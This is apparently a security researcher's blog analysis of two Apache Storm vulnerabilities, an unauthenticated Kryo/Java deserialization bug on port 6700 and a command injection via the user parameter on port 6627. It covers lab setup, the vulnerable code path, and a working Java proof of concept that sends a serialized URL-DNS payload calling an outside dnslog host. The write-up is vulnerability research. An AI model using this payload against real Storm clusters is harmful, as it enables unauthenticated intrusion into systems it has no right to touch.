GitHub Security Lab has published two more vulnerability analyses, so I took a look at them.

- GHSL-2021-086: Unsafe Deserialization in Apache Storm supervisor - CVE-2021-40865

- GHSL-2021-085: Command injection in Apache Storm Nimbus - CVE-2021-38294

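Setting up the environment is painful. You need both ZooKeeper and Storm, and it has to be on Linux, because the CVE-2021-38294 command injection only exists on Linux.

Download links: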

- https://dlcdn.apache.org/zookeeper/zookeeper-3.7.0/apache-zookeeper-3.7.0-bin.tar.gz

- https://apache.mirror.iphh.net/storm/apache-storm-2.2.0/apache-storm-2.2.0.zip

Start ZooKeeper (assuming the archive was extracted to a directory named zookeeper):

    cp zookeeper/conf/zoo_sample.cfg zookeeper/conf/zoo.cfg
    ./zookeeper/bin/zkServer.sh start

Storm configuration: in conf/storm.yaml, uncomment the following lines and change them to your own IP:

    storm.zookeeper.servers:
      - "192.168.137.138"
    nimbus.seeds: ["192.168.137.138"]
    ui.port: 8081

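Start ZooKeeper first, then start the Storm daemons. Each command stays in the foreground, so run each one in its own terminal:

    cd storm/bin
    python3 storm.py nimbus
    python3 storm.py supervisor
    python3 storm.py ui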

The UI web service is then available on port 8081.

Next, a compute job (a Topology) has to be submitted.

Create a Maven project and edit the pom file:

    <?xml version="1.0" encoding="UTF-8"?>
    <project xmlns="http://maven.apache.org/POM/4.0.0"
             xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
             xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
        <modelVersion>4.0.0</modelVersion>

        <groupId>org.example</groupId>
        <artifactId>stormJob</artifactId>
        <version>1.0-SNAPSHOT</version>

        <properties>
            <maven.compiler.source>8</maven.compiler.source>
            <maven.compiler.target>8</maven.compiler.target>
        </properties>
        <dependencies>
            <dependency>
                <groupId>org.apache.storm</groupId>
                <artifactId>storm-core</artifactId>
                <version>2.2.0</version>
            </dependency>
        </dependencies>

    </project>

Create the class sum.ClusterSumStormTopology:

    package sum;

    import java.util.Map;

    import org.apache.storm.Config;
    import org.apache.storm.StormSubmitter;
    import org.apache.storm.generated.AlreadyAliveException;
    import org.apache.storm.generated.AuthorizationException;
    import org.apache.storm.generated.InvalidTopologyException;
    import org.apache.storm.spout.SpoutOutputCollector;
    import org.apache.storm.task.OutputCollector;
    import org.apache.storm.task.TopologyContext;
    import org.apache.storm.topology.OutputFieldsDeclarer;
    import org.apache.storm.topology.TopologyBuilder;
    import org.apache.storm.topology.base.BaseRichBolt;
    import org.apache.storm.topology.base.BaseRichSpout;
    import org.apache.storm.tuple.Fields;
    import org.apache.storm.tuple.Tuple;
    import org.apache.storm.tuple.Values;
    import org.apache.storm.utils.Utils;

    public class ClusterSumStormTopology {

        /**
         * A spout must extend BaseRichSpout.
         * It produces data and emits it.
         */
        public static class DataSourceSpout extends BaseRichSpout {

            private SpoutOutputCollector collector;
            private int number = 0;

            /**
             * Initialization method, called only once before execution.
             * @param conf configuration parameters
             * @param context topology context
             * @param collector the emitter used to send tuples
             */
            @Override
            public void open(Map<String, Object> conf, TopologyContext context, SpoutOutputCollector collector) {
                this.collector = collector;
            }

            /**
             * Produces data; in production this usually comes from a message queue.
             */
            @Override
            public void nextTuple() {
                this.collector.emit(new Values(++number));
                System.out.println("spout emitted: " + number);
                Utils.sleep(1000);
            }

            /**
             * Declares the output fields.
             */
            @Override
            public void declareOutputFields(OutputFieldsDeclarer declarer) {
                // "num" corresponds to the new Values(...) emitted in nextTuple().
                // Declare as many fields here as values are emitted there.
                // The bolt only needs to read the "num" field.
                declarer.declare(new Fields("num"));
            }
        }

        /**
         * Bolt that keeps a running sum.
         * It receives data and processes it.
         */
        public static class SumBolt extends BaseRichBolt {

            private int sum = 0;

            /**
             * Initialization method, executed only once.
             */
            @Override
            public void prepare(Map<String, Object> stormConf, TopologyContext context, OutputCollector collector) {
            }

            /**
             * Receives the data sent by the spout.
             */
            @Override
            public void execute(Tuple input) {
                // "num" is the field name declared in the spout's declareOutputFields().
                // The value can be read by index or by the name declared upstream.
                Integer value = input.getIntegerByField("num");
                sum += value;
                System.out.println("Bolt: sum=" + sum);
            }

            /**
             * Declares the output fields (this bolt emits nothing).
             */
            @Override
            public void declareOutputFields(OutputFieldsDeclarer declarer) {
            }
        }

        public static void main(String[] args) {
            // TopologyBuilder builds the Topology from the spout and the bolt.
            // Every job in Storm is submitted as a Topology,
            // and the Topology defines the order in which spouts and bolts run.
            TopologyBuilder tb = new TopologyBuilder();
            tb.setSpout("DataSourceSpout", new DataSourceSpout());
            // SumBolt receives data from DataSourceSpout using shuffle grouping.
            tb.setBolt("SumBolt", new SumBolt()).shuffleGrouping("DataSourceSpout");

            // Submit the code to the Storm cluster.
            try {
                StormSubmitter.submitTopology("ClusterSumStormTopology", new Config(), tb.createTopology());
            } catch (AlreadyAliveException | InvalidTopologyException | AuthorizationException e) {
                e.printStackTrace();
            }
        }
    }

Build the jar with Maven and copy it to the Storm machine.

Then run:

    python3 storm.py jar /home/ubuntu/stormJob-1.0-SNAPSHOT.jar sum.ClusterSumStormTopology
    python3 storm.py list

The setup only counts as working if list shows the job running.

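For the deserialization bug (CVE-2021-40865), the root cause is that data arriving on port 6700 is deserialized first, and only afterwards is authentication checked.

org.apache.storm.messaging.netty.StormServerPipelineFactory

registers its handlers in this order: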

- MessageDecoder

- SaslStormServerHandler

- SaslStormServerAuthorizeHandler

- StormServerHandler
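Why the order matters can be shown with a toy model. This is only a sketch: `PipelineOrderSketch`, `run` and the stage names are made up for illustration and have nothing to do with Netty's or Storm's real API. Each stage runs in registration order, and the auth stage drops the message when the peer is not authenticated.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

/** Toy model of an inbound handler chain (hypothetical, not Netty/Storm code). */
public class PipelineOrderSketch {

    /** Runs the stages in order and returns the ones that actually saw the message. */
    static List<String> run(List<String> stages, boolean authenticated) {
        List<String> executed = new ArrayList<>();
        for (String stage : stages) {
            executed.add(stage);
            // The auth stage stops the chain for unauthenticated peers.
            if (stage.equals("auth") && !authenticated) {
                break;
            }
        }
        return executed;
    }

    public static void main(String[] args) {
        // Order as registered above: the decoder sees untrusted bytes before auth runs.
        System.out.println(run(Arrays.asList("decode", "auth", "handle"), false));
        // Hypothetical safer order: auth first, so the decoder never runs.
        System.out.println(run(Arrays.asList("auth", "decode", "handle"), false));
    }
}
```

In the first ordering the "decode" stage still runs for an unauthenticated peer, which is exactly the situation described here: whatever the decoder does with the bytes happens before any identity check.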

MessageDecoder overrides decode() to decode the incoming data.

It reads a short from buf; when the value equals -600, it goes into BackPressureStatus.read(bytes, this.deser),

which in turn calls KryoValuesDeserializer.deserializeObject(byte[]).
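To make the framing concrete, here is a rough sketch of the parsing step. It is not Storm's MessageDecoder: `FrameSketch` and `parse` are hypothetical names, and the 4-byte big-endian length field after the short is my assumption, inferred from the byte layout the PoC further down writes.

```java
import java.nio.ByteBuffer;

/** Hypothetical sketch of the "short code, then length, then payload" framing. */
public class FrameSketch {

    // Identifier value mentioned in the text above.
    static final short BACKPRESSURE_ID = -600;

    /** Returns the payload of a back-pressure frame, or null for anything else. */
    static byte[] parse(byte[] frame) {
        ByteBuffer buf = ByteBuffer.wrap(frame); // ByteBuffer is big-endian by default
        if (buf.remaining() < 2) {
            return null;
        }
        short code = buf.getShort();
        if (code != BACKPRESSURE_ID) {
            return null;
        }
        if (buf.remaining() < 4) {
            return null;
        }
        int length = buf.getInt(); // assumed 4-byte length field
        if (length < 0 || length > buf.remaining()) {
            return null;
        }
        byte[] payload = new byte[length];
        buf.get(payload);
        // In the vulnerable flow, these bytes are what gets handed to the deserializer.
        return payload;
    }

    public static void main(String[] args) {
        // 0xFDA8 is -600 as a 16-bit two's complement value.
        byte[] frame = {(byte) 0xFD, (byte) 0xA8, 0, 0, 0, 3, 1, 2, 3};
        System.out.println(parse(frame).length);
    }
}
```

Read this way, the `{0, 0}` that the PoC writes between the code and the length only pads the length to four bytes when BigInteger happens to encode it in exactly two bytes.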

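The KryoValuesDeserializer here is the one passed in by StormServerPipelineFactory: new KryoValuesDeserializer(this.topoConf).

Inside it, SerializationFactory.getKryo(conf) obtains the deserializer object from the serialization factory.

conf.get("topology.kryo.factory") picks the Kryo factory named in the conf. In the PoC this is org.apache.storm.serialization.DefaultKryoFactory. Once the factory class has been obtained, DefaultKryoFactory.getKryo(conf) is called.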



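Line 20 in the screenshot returns a KryoSerializableDefault instance.

Note line 44: when this.override is true, it returns a new SerializableSerializer(), which serializes and deserializes directly through Java's ObjectOutputStream and ObjectInputStream.

So when does this.override become true?

It is set once DefaultKryoFactory.postRegister() has been called. From then on the default serializer is the ObjectInputStream-based one.

postRegister() is called at org/apache/storm/serialization/SerializationFactory.class:92, which is what makes it possible to deserialize arbitrary objects.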
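The flag mechanism is easy to lose track of, so here is a stripped-down model of it. Everything in it is a stand-in: `OverrideSketch`, `SerializerRegistry` and the returned strings are hypothetical and only mimic the behaviour described above, without depending on Kryo or Storm.

```java
/** Simplified model of the override flag; not the real DefaultKryoFactory. */
public class OverrideSketch {

    /** Stand-in for the Kryo subclass that carries the override flag. */
    static class SerializerRegistry {
        private boolean override = false;

        void overrideDefault(boolean value) {
            this.override = value;
        }

        /** Names the serializer used for types without an explicit registration. */
        String defaultSerializerFor(Class<?> type) {
            return override ? "java-serialization" : "kryo-default";
        }
    }

    /** Stand-in for getKryo(conf): a fresh registry with the flag still off. */
    static SerializerRegistry create() {
        return new SerializerRegistry();
    }

    /** Stand-in for postRegister(): flips the flag. */
    static void postRegister(SerializerRegistry registry) {
        registry.overrideDefault(true);
    }

    public static void main(String[] args) {
        SerializerRegistry registry = create();
        System.out.println(registry.defaultSerializerFor(java.util.HashMap.class));
        postRegister(registry);
        System.out.println(registry.defaultSerializerFor(java.util.HashMap.class));
    }
}
```

The point of the model is that the registry looks harmless right after creation; it only falls back to Java serialization for unregistered types once the post-registration hook has run.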

The PoC is as follows:

    package com.test;

    import org.apache.storm.serialization.KryoValuesSerializer;

    import java.io.ByteArrayOutputStream;
    import java.io.IOException;
    import java.io.OutputStream;
    import java.lang.reflect.Field;
    import java.math.BigInteger;
    import java.net.*;
    import java.util.HashMap;

    public class Main {

        public static byte[] buffer(KryoValuesSerializer ser, Object obj) throws IOException {
            byte[] payload = ser.serializeObject(obj);
            BigInteger codeInt = BigInteger.valueOf(-600);
            byte[] code = codeInt.toByteArray();
            BigInteger lengthInt = BigInteger.valueOf(payload.length);
            byte[] length = lengthInt.toByteArray();

            ByteArrayOutputStream outputStream = new ByteArrayOutputStream();
            outputStream.write(code);
            outputStream.write(new byte[]{0, 0});
            outputStream.write(length);
            outputStream.write(payload);
            return outputStream.toByteArray();
        }

        public static KryoValuesSerializer getSerializer() throws MalformedURLException {
            HashMap<String, Object> conf = new HashMap<>();
            conf.put("topology.kryo.factory", "org.apache.storm.serialization.DefaultKryoFactory");
            conf.put("topology.tuple.serializer", "org.apache.storm.serialization.types.ListDelegateSerializer");
            conf.put("topology.skip.missing.kryo.registrations", false);
            conf.put("topology.fall.back.on.java.serialization", true);
            return new KryoValuesSerializer(conf);
        }

        public static void main(String[] args) {
            try {
                // Payload construction
                URLStreamHandler handler = new SilentURLStreamHandler();
                String url = "http://aqa13.dnslog.cn";

                HashMap ht = new HashMap(); // HashMap that will contain the URL
                URL u = new URL(null, url, handler); // URL to use as the Key
                ht.put(u, url); // The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
                Field hashCode = u.getClass().getDeclaredField("hashCode");
                hashCode.setAccessible(true);
                hashCode.set(u, -1);

                // Kryo serialization
                byte[] bytes = buffer(getSerializer(), ht);

                // Send bytes
                Socket socket = new Socket("192.168.137.138", 6700);
                OutputStream outputStream = socket.getOutputStream();
                outputStream.write(bytes);
                outputStream.flush();
                outputStream.close();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

        static class SilentURLStreamHandler extends URLStreamHandler {

            protected URLConnection openConnection(URL u) throws IOException {
                return null;
            }

            protected synchronized InetAddress getHostAddress(URL u) {
                return null;
            }
        }

    }

As for RCE, I did not find a usable gadget. What http://noahblog.360.cn/apache-storm-vulnerability-analysis/ says about it is wrong.

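Now the command injection (CVE-2021-38294). Port 6627 exposes many services, and they can be connected to and called without authentication.

The user parameter is passed into isUserPartOf(),

then on to this.groupMapper.getGroups(user),

and passed along further,

until it is concatenated into a command line and executed, which is the command injection.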
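The difference between concatenating a value into a shell string and passing it as an argument can be sketched like this. The class, the method names, the `id -Gn` command line and the user-name pattern are all my own illustration, not Storm's actual code or its fix, and nothing here is executed: the sketch only builds the argument arrays.

```java
import java.util.regex.Pattern;

/** Hypothetical sketch: shell-string concatenation versus a validated argv entry. */
public class GroupCommandSketch {

    // Assumed allow-list for account names; adjust to the local naming policy.
    private static final Pattern SAFE_USER = Pattern.compile("[A-Za-z_][A-Za-z0-9_.-]{0,31}");

    /** Vulnerable pattern: the user name becomes part of a script that bash parses. */
    static String[] unsafeCommand(String user) {
        return new String[] {"bash", "-c", "id -Gn " + user};
    }

    /** Safer pattern: validate first, then pass the name as one argument, with no shell. */
    static String[] saferCommand(String user) {
        if (!SAFE_USER.matcher(user).matches()) {
            throw new IllegalArgumentException("invalid user name");
        }
        return new String[] {"id", "-Gn", user};
    }

    public static void main(String[] args) {
        String hostile = "foo; echo injected";
        // The third element is a script, so the ';' would start a second command.
        System.out.println(unsafeCommand(hostile)[2]);
        try {
            saferCommand(hostile);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

With the first form, anything the caller puts in the user name is interpreted by the shell. With the second, the name is checked against the pattern and, even if it got through, it would reach the program as a single argument rather than as shell syntax.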

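My writing is poor, the wording flippant, the content shallow and the technique unpolished. Corrections and pointers from more experienced readers are very welcome.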
